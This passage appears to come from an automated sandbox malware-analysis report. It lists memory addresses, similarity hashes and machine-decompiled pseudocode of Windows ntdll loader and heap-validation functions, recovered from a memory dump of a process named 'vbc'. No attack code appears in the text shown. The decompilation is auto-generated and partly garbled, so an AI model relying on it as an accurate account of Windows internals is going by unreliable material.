                                                  0x01621de1
                                                  0x01621def
                                                  0x01621df3
                                                  0x01621df7
                                                  0x01621dfe
                                                  0x01621e06
                                                  0x015da302
                                                  0x015da308
                                                  0x015da308
                                                  0x015da288
                                                  0x015da28d
                                                  0x015da294
                                                  0x01621cc1
                                                  0x015da29a
                                                  0x015da29a
                                                  0x015da29a
                                                  0x015da29f
                                                  0x01621ccb
                                                  0x01621cd1
                                                  0x01621cd8
                                                  0x01621cea
                                                  0x01621cea
                                                  0x01621cd8
                                                  0x015da2a9
                                                  0x015da2af
                                                  0x015da2bc
                                                  0x01621cfd
                                                  0x015da2c2
                                                  0x015da2c2
                                                  0x015da2c2
                                                  0x015da2c7
                                                  0x01621d07
                                                  0x01621d0d
                                                  0x01621d14
                                                  0x01621d1f
                                                  0x01621d21
                                                  0x01621d2c
                                                  0x01621d2c
                                                  0x01621d2c
                                                  0x01621d47
                                                  0x01621d47
                                                  0x01621d14
                                                  0x015da2cd
                                                  0x015da2d2
                                                  0x015da2d9
                                                  0x01621d5a
                                                  0x015da2df
                                                  0x015da2df
                                                  0x015da2df
                                                  0x015da2e4
                                                  0x01621d69
                                                  0x01621d6b
                                                  0x01621d76
                                                  0x01621d76
                                                  0x01621d76
                                                  0x01621d91
                                                  0x01621d91
                                                  0x015da2ea
                                                  0x015da2f0
                                                  0x015da2f5
                                                  0x01621da8
                                                  0x01621dad
                                                  0x01621dad
                                                  0x015da2fd
                                                  0x015da300
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                  • API String ID: 2994545307-2586055223
                                                  • Opcode ID: 27d4157f3c6a3199546b08bc6b0bfd9872b8ae1d8b7272eaeb5fccbb76ac991d
                                                  • Instruction ID: 453573556fb2d20d1f716c0b7e20e82061417cfd692d73ad33d3f785c2464a28
                                                  • Opcode Fuzzy Hash: 27d4157f3c6a3199546b08bc6b0bfd9872b8ae1d8b7272eaeb5fccbb76ac991d
                                                  • Instruction Fuzzy Hash: BC51F532209A929FE722EB6DCC44F677BE9FB85B50F080868F551CF291D764D900CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E8E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 44%
                                                  			E015E8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x16ad360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x16a8464; // 0x76ed0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x16a5780 & 0x00000003) != 0) {
							E01635510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x16a5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E015FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x16a7984; // 0x1152b70
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x16a8464; // 0x76ed0110
					 *0x16ab1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E015E9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x16a5780 & 0x00000005) != 0) {
						_push(_t49);
						E01635510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                  0x015e8e0f
                                                  0x015e8e16
                                                  0x015e8e19
                                                  0x015e8e1b
                                                  0x015e8e21
                                                  0x015e8e7f
                                                  0x015e8e85
                                                  0x01629354
                                                  0x0162936c
                                                  0x01629371
                                                  0x0162937b
                                                  0x01629381
                                                  0x01629381
                                                  0x0162937b
                                                  0x015e8e9d
                                                  0x015e8e9d
                                                  0x015e8e29
                                                  0x015e8e2c
                                                  0x015e8e38
                                                  0x015e8e3e
                                                  0x015e8e43
                                                  0x015e8eb5
                                                  0x015e8eb9
                                                  0x016292aa
                                                  0x016292af
                                                  0x016292e8
                                                  0x016292e8
                                                  0x016292af
                                                  0x015e8eb9
                                                  0x015e8e45
                                                  0x015e8e53
                                                  0x015e8e5b
                                                  0x015e8e5f
                                                  0x015e8e78
                                                  0x015e8e78
                                                  0x015e8e7d
                                                  0x015e8ec3
                                                  0x015e8ecd
                                                  0x015e8ed2
                                                  0x015e8ed2
                                                  0x015e8ec5
                                                  0x015e8ec5
                                                  0x00000000
                                                  0x015e8e7d
                                                  0x015e8e67
                                                  0x015e8ea4
                                                  0x0162931a
                                                  0x00000000
                                                  0x00000000
                                                  0x01629320
                                                  0x015e8ea4
                                                  0x015e8e70
                                                  0x01629325
                                                  0x01629340
                                                  0x01629345
                                                  0x01629345
                                                  0x015e8e76
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Strings
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 0162933B, 01629367
                                                  • LdrpFindDllActivationContext, xrefs: 01629331, 0162935D
                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0162932A
                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 01629357
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 0-3779518884
                                                  • Opcode ID: 19415c6ecfe0bbf4a3beb5848ac64bb54c7df92d89d1088f23863cf541eeb6b4
                                                  • Instruction ID: 7d1d7f8148a562dc3415b5d9b5b1dbde5bfcfa79f32ec6b80bafde100d10adc9
                                                  • Opcode Fuzzy Hash: 19415c6ecfe0bbf4a3beb5848ac64bb54c7df92d89d1088f23863cf541eeb6b4
                                                  • Instruction Fuzzy Hash: E5412732E007219EEF3EAB5C8C4DB3EB7E5BB40358F094569E9045F151E770AD808782
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 016749A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                  • API String ID: 2994545307-336120773
                                                  • Opcode ID: 31ce2a2792897892fd6a603c04888cfa1b55f6fae3ca811936b7057ef33b7c8a
                                                  • Instruction ID: 08b484f7e107bde4020ac23b14bb08a61de34091ccd6b30a7c58bb44de463f44
                                                  • Opcode Fuzzy Hash: 31ce2a2792897892fd6a603c04888cfa1b55f6fae3ca811936b7057ef33b7c8a
                                                  • Instruction Fuzzy Hash: 55314431200562EFD721EBA9CCC9FAB77E8FF00620F15415AF9058F245EBB0A944CB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015D99BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E015D99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0166FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0167A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0160D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E015BB150();
										} else {
											E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E015BB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x16a6378 = 1;
											asm("int3");
											 *0x16a6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E015DA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E015DA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E015DBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0167A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E015DA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E015DA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0160D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E015BB150();
								} else {
									E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E015BB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x16a6378 = 1;
									asm("int3");
									 *0x16a6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0166FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0167A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0160D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E015BB150();
													} else {
														E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E015BB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x16a6378 = 1;
														asm("int3");
														 *0x16a6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E015DA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E015DA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E015DBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0167A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0160D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E015BB150();
													} else {
														E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E015BB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x16a6378 = 1;
														asm("int3");
														 *0x16a6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E015DA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E015DA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E015DBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E015DBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                  0x015d99ca
                                                  0x015d99cc
                                                  0x015d99df
                                                  0x015d99e3
                                                  0x015d99f8
                                                  0x015d99fb
                                                  0x015d99fb
                                                  0x00000000
                                                  0x015d9a48
                                                  0x015d9a48
                                                  0x015d9a4c
                                                  0x015d9a51
                                                  0x015d9a55
                                                  0x015d9a61
                                                  0x015d9a66
                                                  0x015d9a68
                                                  0x01621457
                                                  0x0162145c
                                                  0x0162145c
                                                  0x015d9a68
                                                  0x015d9a6e
                                                  0x015d9a71
                                                  0x015d9a74
                                                  0x015d9a76
                                                  0x01621466
                                                  0x01621469
                                                  0x01621469
                                                  0x0162146c
                                                  0x0162146e
                                                  0x01621471
                                                  0x01621474
                                                  0x01621477
                                                  0x01621479
                                                  0x0162159c
                                                  0x0162159c
                                                  0x0162159d
                                                  0x016215a6
                                                  0x016215ab
                                                  0x016215ab
                                                  0x00000000
                                                  0x016215ab
                                                  0x0162147f
                                                  0x01621481
                                                  0x00000000
                                                  0x00000000
                                                  0x0162148a
                                                  0x0162148d
                                                  0x01621493
                                                  0x01621495
                                                  0x016214c0
                                                  0x016214c0
                                                  0x016214c3
                                                  0x016214c6
                                                  0x016214c8
                                                  0x016214cb
                                                  0x016214cf
                                                  0x016214f2
                                                  0x016214f2
                                                  0x016214f5
                                                  0x016214f8
                                                  0x01621501
                                                  0x01621508
                                                  0x0162150b
                                                  0x0162150e
                                                  0x01621510
                                                  0x01621513
                                                  0x01621515
                                                  0x01621515
                                                  0x01621518
                                                  0x01621518
                                                  0x01621513
                                                  0x01621521
                                                  0x01621525
                                                  0x0162152a
                                                  0x0162152d
                                                  0x01621530
                                                  0x01621532
                                                  0x01621539
                                                  0x0162153d
                                                  0x0162155d
                                                  0x01621562
                                                  0x0162153f
                                                  0x01621555
                                                  0x0162155a
                                                  0x01621570
                                                  0x01621577
                                                  0x0162157c
                                                  0x01621582
                                                  0x01621585
                                                  0x01621589
                                                  0x0162158b
                                                  0x01621592
                                                  0x01621593
                                                  0x01621593
                                                  0x01621589
                                                  0x01621530
                                                  0x00000000
                                                  0x016214f8
                                                  0x016214d5
                                                  0x016214da
                                                  0x016214dc
                                                  0x00000000
                                                  0x016214de
                                                  0x016214e8
                                                  0x00000000
                                                  0x016214e8
                                                  0x01621497
                                                  0x01621497
                                                  0x016214a4
                                                  0x016214a4
                                                  0x016214a7
                                                  0x016214a9
                                                  0x016214ab
                                                  0x016214ab
                                                  0x0162149c
                                                  0x0162149e
                                                  0x016214a0
                                                  0x016214b0
                                                  0x016214b0
                                                  0x00000000
                                                  0x016214a2
                                                  0x016214a2
                                                  0x00000000
                                                  0x016214a2
                                                  0x016214a0
                                                  0x016214b3
                                                  0x016214bb
                                                  0x00000000
                                                  0x016214bb
                                                  0x01621495
                                                  0x015d9a7c
                                                  0x015d9a7c
                                                  0x015d9a7f
                                                  0x015d9a7f
                                                  0x015d9a82
                                                  0x015d9a84
                                                  0x015d9a87
                                                  0x015d9a8a
                                                  0x015d9a8d
                                                  0x015d9a8f
                                                  0x0162166a
                                                  0x0162166a
                                                  0x0162166b
                                                  0x01621674
                                                  0x00000000
                                                  0x01621674
                                                  0x015d9a95
                                                  0x015d9a97
                                                  0x00000000
                                                  0x00000000
                                                  0x015d9aa0
                                                  0x015d9aa3
                                                  0x015d9aa9
                                                  0x015d9aab
                                                  0x015d9ad7
                                                  0x015d9ad7
                                                  0x015d9ada
                                                  0x015d9add
                                                  0x015d9adf
                                                  0x015d9ae2
                                                  0x015d9ae6
                                                  0x015d9b22
                                                  0x015d9b27
                                                  0x015d9b29
                                                  0x00000000
                                                  0x015d9b2b
                                                  0x016215be
                                                  0x00000000
                                                  0x016215be
                                                  0x015d9b29
                                                  0x015d9ae8
                                                  0x015d9ae8
                                                  0x015d9aeb
                                                  0x015d9aee
                                                  0x016215cb
                                                  0x016215d2
                                                  0x016215d5
                                                  0x016215d7
